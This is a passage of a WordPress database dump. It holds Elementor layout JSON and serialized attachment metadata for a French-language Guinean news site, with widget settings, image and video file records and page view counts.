"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1862,602,'_elementor_version','0.4'),(1864,603,'_edit_last','1'),(1865,603,'_edit_lock','1509541159:1'),(1866,604,'_wp_attached_file','2017/10/AfricaPostNews-Guinée-vetements-de-sport.jpg'),(1867,604,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:450;s:4:\"file\";s:53:\"2017/10/AfricaPostNews-Guinée-vetements-de-sport.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"AfricaPostNews-Guinée-vetements-de-sport-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"AfricaPostNews-Guinée-vetements-de-sport-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1868,605,'_wp_attached_file','2017/10/JTR-ESPACE-TV-N°000000.mp4'),(1869,605,'_wp_attachment_metadata','a:9:{s:8:\"filesize\";i:164135748;s:9:\"mime_type\";s:15:\"video/quicktime\";s:6:\"length\";i:446;s:16:\"length_formatted\";s:4:\"7:26\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}}'),(1870,603,'_thumbnail_id','604'),(1871,603,'_wp_page_template','default'),(1875,603,'post_views_count','617'),(1876,607,'_menu_item_type','post_type'),(1877,607,'_menu_item_menu_item_parent','0'),(1878,607,'_menu_item_object_id','526'),(1879,607,'_menu_item_object','page'),(1880,607,'_menu_item_target',''),(1881,607,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1882,607,'_menu_item_xfn',''),(1883,607,'_menu_item_url',''),(1885,526,'_elementor_edit_mode','builder'),(1886,526,'_elementor_data','[{\"id\":\"fvicxca\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"i3u6627\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"hofs521\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"8\"],\"category_border_color\":\"#432277\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#432277\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"fd5brb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"wpbhkym\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1887,608,'_elementor_edit_mode','builder'),(1888,608,'_elementor_data','[{\"id\":\"fvicxca\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"i3u6627\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"fd5brb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"zugzy86\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1889,526,'_elementor_version','0.4'),(1890,609,'_elementor_edit_mode','builder'),(1891,609,'_elementor_data','[{\"id\":\"fvicxca\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"i3u6627\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"hofs521\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"8\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"fd5brb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"zugzy86\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1892,609,'_elementor_version','0.4'),(1896,611,'_wp_attached_file','2017/10/Loniya.jpg'),(1897,611,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:18:\"2017/10/Loniya.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Loniya-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Loniya-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1900,613,'_edit_last','1'),(1901,613,'_edit_lock','1509635297:1'),(1902,614,'_wp_attached_file','2017/10/Loniya-1.jpg'),(1903,614,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:20:\"2017/10/Loniya-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Loniya-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Loniya-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1904,613,'_thumbnail_id','826'),(1905,613,'_wp_page_template','default'),(1913,613,'post_views_count','3132'),(1914,618,'_wp_attached_file','2017/10/Mamadou-Alpha-Diallo.jpg'),(1915,618,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:540;s:6:\"height\";i:960;s:4:\"file\";s:32:\"2017/10/Mamadou-Alpha-Diallo.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Mamadou-Alpha-Diallo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Mamadou-Alpha-Diallo-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1918,619,'_edit_last','1'),(1919,619,'_edit_lock','1509539668:1'),(1920,620,'_wp_attached_file','2017/10/ocp3.jpg'),(1921,620,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:320;s:6:\"height\";i:240;s:4:\"file\";s:16:\"2017/10/ocp3.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ocp3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ocp3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1922,621,'_wp_attached_file','2017/10/ocp-2.jpg'),(1923,621,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:320;s:6:\"height\";i:240;s:4:\"file\";s:17:\"2017/10/ocp-2.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"ocp-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ocp-2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1924,619,'_thumbnail_id','623'),(1925,619,'_wp_page_template','default'),(1928,619,'post_views_count','432'),(1929,623,'_wp_attached_file','2017/10/Yali-Guinée.jpg'),(1930,623,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:656;s:6:\"height\";i:437;s:4:\"file\";s:24:\"2017/10/Yali-Guinée.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Yali-Guinée-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Yali-Guinée-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:7:\"DIAOUNE\";s:6:\"camera\";s:14:\"Canon EOS 700D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481903380\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1941,626,'_edit_last','1'),(1942,626,'_edit_lock','1509539656:1'),(1943,627,'_wp_attached_file','2017/10/unnamed.png'),(1944,627,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:506;s:6:\"height\";i:900;s:4:\"file\";s:19:\"2017/10/unnamed.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"unnamed-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"unnamed-169x300.png\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1945,628,'_wp_attached_file','2017/10/Mood.jpg'),(1946,628,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:16:\"2017/10/Mood.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Mood-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"Mood-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1949,626,'_thumbnail_id','628'),(1950,626,'_wp_page_template','default'),(1955,626,'post_views_count','101'),(1956,632,'_edit_last','1'),(1957,632,'_edit_lock','1511196196:1'),(1958,632,'_wp_page_template','default'),(1962,632,'post_views_count','69'),(1963,632,'_elementor_data','[{\"id\":\"muazdsg\",\"elType\":\"section\",\"settings\":[],\